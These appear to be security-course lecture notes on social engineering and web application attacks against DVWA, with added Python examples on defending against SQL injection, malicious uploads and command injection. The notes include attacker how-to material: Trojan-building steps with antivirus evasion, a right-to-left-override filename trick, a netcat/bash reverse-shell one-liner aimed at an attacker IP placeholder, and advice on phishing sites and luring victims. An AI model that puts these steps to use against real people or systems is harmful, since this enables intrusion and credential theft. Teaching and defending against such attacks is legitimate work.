Full Transcript

Social engineering attack process

Information gathering: Engage with targets to gather useful information about them or their organisations, colleagues, families, etc. You can get information about the company's employees by going to the organisation's website. There, you can identify the employees and get their contact information. Another way is to physically engage with a target by going to corporate events, parties, etc. Social media can also be a good source of information on employees.

Identifying vulnerable individuals: A suitable insider needs to be selected: someone who is important enough to have access to some valuable resources and information, but not so senior that they will be closely monitored. Targets of interest could include the CIO (Chief Information Officer), CSO (Chief Security Officer), Director of IT, CFO, Director of HR, perhaps a "Sysadmin".

Planning the attack: The attack could be carried out either in person or remotely. A suitable method should be chosen. For example, if the target is known to be likely to click any links sent by email, then a phishing email would be an effective approach. The plan often needs other social engineering skills such as natural charisma, a good phone voice, an ability to convincingly discuss a wide variety of topics and physical appearance (in any face-to-face attacks).

Execution: The planned attack should be carried out with confidence and patience to observe and assess the results of target exploitation. Depending on the complexity of the attack, other technical apparatus like fake websites and malware may need to be arranged.

Social engineering attack vectors

Phishing: Trying to get credentials by pretending to be a trustworthy entity.
Spear phishing: Phishing attacks that are directed at specific individuals or companies; attackers may gather personal information about their target to increase their probability of success.
Vishing: Phishing using phone calls.
Smishing: Phishing using SMS.
Baiting: A real-world Trojan horse; it relies on the curiosity or greed of the victim to be executed. For example, an attacker may create a disk featuring a corporate logo, available from the target's website, and label it "Promotion Result 2019 -- Human Resources". The attacker then leaves the disk somewhere in the target company, where it could attract some employees' attention. Once the disk is connected to a device, it installs malware to steal information or gain unauthorized access.
Quid pro quo: Something for something. An attacker calls random numbers at a company, claiming to be calling back from technical support. Eventually this person will hit someone with a legitimate problem, grateful that someone is calling back to help them. The attacker will "help" solve the problem and, in the process, have the user type commands that give the attacker access or launch malware.

Protection against social engineering

From the organization's perspective:
- Create access control rules in such a way that employees only have access to some but not all levels of information; information is disseminated purely on a need-to-know basis.
- Establish an ID system where all employees, independent contractors and consultants are issued with IDs when hired or engaged. Make sure that all employees, contractors and consultants who no longer work for the organization return their user IDs and credentials.
- Take immediate action whenever suspicious activities or security breaches are noted.
- Take good care of private and proprietary information.
- Anyone who visits the premises should be accompanied by an official representative or authorized person from the organization.
- Require individuals to change passwords on a regular basis.
- Create a culture of taking security awareness and training seriously -- it is not an expense, but an investment.
- Establish an awareness program for individuals.
From the individual's perspective:
- Do not share private information with people on social media. Social engineers will try to approach unsuspecting victims through friend and connection requests on Facebook or LinkedIn.
- Do not reveal your passwords to anyone.
- Do not click on links in unsolicited emails that lead to web pages requesting personal information.
- Do not open email attachments that come from strange addresses.
- Do not allow strangers to connect to your wireless network. A hacker can easily put malware or a network analyzer into your system.

------------------------------------------------------------------------

Three tiers of a database-driven web application

The presentation tier is what the users see. The logic tier receives service requests from the presentation tier, executes the script that retrieves data from the data tier, and sends the result back to the presentation tier. The data tier returns data to the logic tier.

Preventing SQL attacks

Blacklisting involves creating a list of known dangerous patterns, characters or commands that should be blocked. For example, if you know that certain SQL keywords like "UNION" are commonly used in SQL injection attacks, you can block these keywords from being used in input fields on your website.
Whitelisting is the opposite approach. Instead of listing what should be blocked, you define a list of safe or allowed operations, inputs or characters. For example, if you have an input field that only needs to accept numbers, you can whitelist numerical characters and reject anything else.
Give users very limited execution privileges.

How to make a backdoor Trojan effective
- The Trojan should look like a legitimate file that does not arouse suspicion: users usually are not suspicious of non-executable files.
- Social engineering should be conducted to lure targets: for example, the Trojan may be a picture, a PDF or a small app that the target is interested in.
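The blacklisting and whitelisting approaches described under "Preventing SQL attacks" above, shown side by side with a parameterised query. This is an added example written for these notes, not code from the notes or from DVWA; the in-memory SQLite table, the user names and the sample payloads are constructed for illustration.

```python
import re
import sqlite3


def build_db():
    """Constructed sample database: a tiny users table (not from the notes)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, secret TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "alice", "alice-secret"), (2, "bob", "bob-secret")],
    )
    return conn


def lookup_vulnerable(conn, user_id):
    """Vulnerable pattern: user input is concatenated into the SQL text,
    so an input such as "1 OR 1=1" changes the meaning of the query."""
    query = "SELECT name FROM users WHERE id = " + user_id
    return [row[0] for row in conn.execute(query)]


# Blacklisting (from the notes): reject inputs containing known-dangerous
# tokens. It stops the UNION payload but not "1 OR 1=1", which uses none
# of the listed tokens; blacklists are easy to bypass.
BLOCKED_TOKENS = ("UNION", "SELECT", "--", ";")


def lookup_blacklist(conn, user_id):
    if any(tok in user_id.upper() for tok in BLOCKED_TOKENS):
        raise ValueError("blocked input")
    return lookup_vulnerable(conn, user_id)


def lookup_whitelist(conn, user_id):
    """Whitelisting (from the notes): an id field only needs digits,
    so accept nothing else before the value reaches the query."""
    if not re.fullmatch(r"[0-9]{1,10}", user_id):
        raise ValueError("id must be numeric")
    return lookup_vulnerable(conn, user_id)  # safe only because of the check above


def lookup_parameterised(conn, user_id):
    """Parameterised query: the driver keeps data separate from SQL code,
    so the input is never parsed as SQL whatever it contains."""
    rows = conn.execute("SELECT name FROM users WHERE id = ?", (user_id,))
    return [row[0] for row in rows]


def is_rejected(lookup, conn, user_id):
    """True if the lookup function refuses the input (used by the checks below)."""
    try:
        lookup(conn, user_id)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = build_db()
    payload = "1 OR 1=1"
    print("vulnerable:", lookup_vulnerable(db, payload))   # both users leak
    print("blacklist rejects?", is_rejected(lookup_blacklist, db, payload))
    print("whitelist rejects?", is_rejected(lookup_whitelist, db, payload))
    print("parameterised:", lookup_parameterised(db, payload))  # no match
```

The third point in the notes, limited privileges, is not shown in code: it is a database-side setting (a web application account that can only SELECT from the tables it needs), so even a successful injection cannot read other tables or write to them.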
A Trojan backdoor is a type of malicious software (malware) that appears to be a legitimate program or file but actually contains harmful code. Once installed, it allows unauthorized access to a user's computer or network, effectively creating a "backdoor" for attackers.

Trojan production in practice:
1. Make a backdoor using tools like msfvenom or Veil-Evasion. Make sure that the backdoor is not detected by current anti-virus scanning programs.
2. Using a scripting language, combine the backdoor with another app such as a picture viewer, a PDF viewer, or a small utility app such as a calculator or a game console.
3. Compile the resulting file and change the file extension if possible.
4. Deliver the Trojan to the target.

Thanks to user awareness programs, it is widely known that a file with a .exe extension is dangerous and should not be clicked. So it has been common practice for an attacker to change the apparent file format of the Trojan to jpg or pdf. For example, using the right-to-left override character, "abcgpj.exe" is displayed as "abcexe.jpg" and "abcfdp.exe" as "abcexe.pdf". This method is effective in some situations, but careful users might notice "exe" in the file name. Hiding the file extension has limitations, and it would be more effective to lure users into installing the executable somehow.

A simple Linux/Unix backdoor

A reverse shell can be constructed using a simple Unix command:
- On the attacker's machine: nc -l -p 8080
- On the target's (client's) machine: bash -i >& /dev/tcp/[AttackerIP]/8080 0>&1

Social engineering to lure a victim into entering the above Bash command:
- The quid pro quo method can be used.
- Phishing emails can be used.

Setting up fake websites
- This will lure users into entering their user names and passwords into a fake site, set up by an attacker to imitate a popular website.
- The fake site should look very similar or identical to the original site so that users do not find anything suspicious.
- Usually, upon receiving the target's username and password, the fake website sends an error message, which looks benign.

Damn Vulnerable Web Application (DVWA) is a web application that has been deliberately made vulnerable for web penetration testing practice.

File upload vulnerability: The attacker uploads executable files such as PHP files to a vulnerable website.
Basic steps:
- Generate PHP code that will serve as a backdoor.
- Upload the backdoor to the vulnerable server.
- Establish a connection.
- Exploit.
Weevely: A PHP backdoor generation tool in Kali. It creates a PHP backdoor that acts as a stealthy web shell.

Command execution vulnerability
- Attackers are allowed to execute OS commands on the target web server.
- A code execution vulnerability can be used to obtain a reverse shell by making the target server connect to the attacker's machine.
- A code execution vulnerability can be used to upload any file (using the wget command).
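Two of the passages above describe the same defensive problem from different angles: the right-to-left override trick that makes "abcgpj.exe" display as "abcexe.jpg", and the file upload vulnerability where a PHP file is accepted as if it were an image. The check below, an added example written for these notes and not code from the notes, DVWA or Weevely, handles both: it flags Unicode bidirectional control characters in the filename, determines the true extension in stored byte order, allow-lists extensions, verifies the file's leading bytes against the declared type, and issues a random stored name. The allow-list, the magic-byte table and the sample uploads are assumptions made for illustration; the displayed_name helper models only the U+202E case.

```python
import secrets

# Unicode bidirectional control characters. U+202E RIGHT-TO-LEFT OVERRIDE is
# the one used in the "abcgpj.exe" -> "abcexe.jpg" trick described in the notes.
BIDI_CONTROLS = (
    {chr(c) for c in range(0x202A, 0x202F)}   # LRE, RLE, PDF, LRO, RLO
    | {chr(c) for c in range(0x2066, 0x206A)}  # LRI, RLI, FSI, PDI
    | {"\u200E", "\u200F"}                     # LRM, RLM
)

# Allow-list (assumption for this example): extension -> expected leading bytes.
ALLOWED_TYPES = {
    "jpg": b"\xff\xd8\xff",
    "png": b"\x89PNG\r\n\x1a\n",
    "pdf": b"%PDF-",
}


def has_bidi_controls(filename):
    return any(ch in BIDI_CONTROLS for ch in filename)


def true_extension(filename):
    """Extension in stored byte order, with any bidi controls removed."""
    clean = "".join(ch for ch in filename if ch not in BIDI_CONTROLS)
    return clean.rsplit(".", 1)[-1].lower() if "." in clean else ""


def displayed_name(filename):
    """How a naive renderer shows the name: text after an RLO is reversed.
    Models only U+202E; enough to show why the true extension must be checked."""
    if "\u202E" not in filename:
        return filename
    head, tail = filename.split("\u202E", 1)
    return head + tail[::-1]


def check_upload(filename, content):
    """Return (accepted, reason). Rejects on the first failed check."""
    if has_bidi_controls(filename):
        return False, "filename contains bidi control characters"
    ext = true_extension(filename)
    if ext not in ALLOWED_TYPES:
        return False, f"extension '{ext}' is not allow-listed"
    if not content.startswith(ALLOWED_TYPES[ext]):
        return False, "content does not match the declared type"
    return True, "ok"


def stored_name(ext):
    """Never keep the client's name: store under a random name with the
    verified extension so double extensions such as x.php.jpg cannot survive."""
    return secrets.token_hex(16) + "." + ext


if __name__ == "__main__":
    # Constructed sample uploads (not from the notes).
    rlo_name = "abc\u202Egpj.exe"
    print(repr(displayed_name(rlo_name)), "is really", true_extension(rlo_name))
    print(check_upload(rlo_name, b"MZ\x90\x00"))
    print(check_upload("shell.php", b"<?php echo 1; ?>"))
    print(check_upload("photo.jpg", b"<?php echo 1; ?>"))   # wrong magic bytes
    print(check_upload("photo.jpg", b"\xff\xd8\xff\xe0JFIF"), stored_name("jpg"))
```

The content check is deliberately done after the extension check, so the reason string tells an operator which layer rejected the file; both layers are needed, because an allow-listed extension says nothing about what the bytes are, and correct magic bytes say nothing about what the web server will do with the name. The upload directory should also be configured so that nothing in it is executed server-side.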
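For the command execution vulnerability in the last section, the root cause is the same as for SQL injection: user input spliced into a command string that a shell then parses. The added example below (written for these notes; not from the notes or from DVWA) contrasts the vulnerable shell-string form with the hardened argument-list form, and applies the whitelisting idea from the SQL section to a hostname field. To stay harmless and runnable offline, the demonstration runs echo instead of ping; safe_ping_argv only builds the argument list and run_ping is what a real handler would call. The hostname regex and the use of /bin/sh are assumptions of this example.

```python
import re
import subprocess

# Whitelist for a hostname field (assumption): dot-separated labels of
# letters, digits and hyphens, each starting and ending alphanumerically,
# so values such as "-c", "8.8.8.8; id" or "$(id)" are rejected.
_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
HOST_RE = re.compile(rf"^(?:{_LABEL}\.)*{_LABEL}$")


def validate_host(host):
    return len(host) <= 253 and HOST_RE.match(host) is not None


def _stdout_lines(result):
    return result.stdout.decode(errors="replace").splitlines()


def demo_vulnerable(value):
    """Vulnerable pattern: the value is concatenated into a command string
    that /bin/sh parses, so a ';' in the input starts a second command.
    echo stands in for ping here so the demonstration is harmless."""
    result = subprocess.run(["/bin/sh", "-c", "echo " + value],
                            capture_output=True, timeout=5)
    return _stdout_lines(result)


def demo_safe(value):
    """Hardened pattern: no shell; the value is one argv element, so shell
    metacharacters are passed through literally and never interpreted."""
    result = subprocess.run(["echo", value], capture_output=True, timeout=5)
    return _stdout_lines(result)


def safe_ping_argv(host):
    """Build the ping argument list for a validated host (no shell involved)."""
    if not validate_host(host):
        raise ValueError("invalid hostname")
    return ["ping", "-c", "1", host]


def run_ping(host):
    """What a real handler would call: validated input, argument list, timeout."""
    return subprocess.run(safe_ping_argv(host), capture_output=True, timeout=10)


if __name__ == "__main__":
    payload = "example.test; echo INJECTED"   # constructed sample input
    print("shell string :", demo_vulnerable(payload))   # two lines: injection ran
    print("argument list:", demo_safe(payload))         # one line, taken literally
    print("validate     :", validate_host(payload), validate_host("example.test"))
```

Validation and the argument-list call are independent defences: the argument list alone already stops shell injection, and validation additionally stops option injection (a host beginning with "-") and keeps the accepted input small enough to reason about. Where a page must run an external tool at all, both belong together with a timeout and a minimal-privilege service account.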
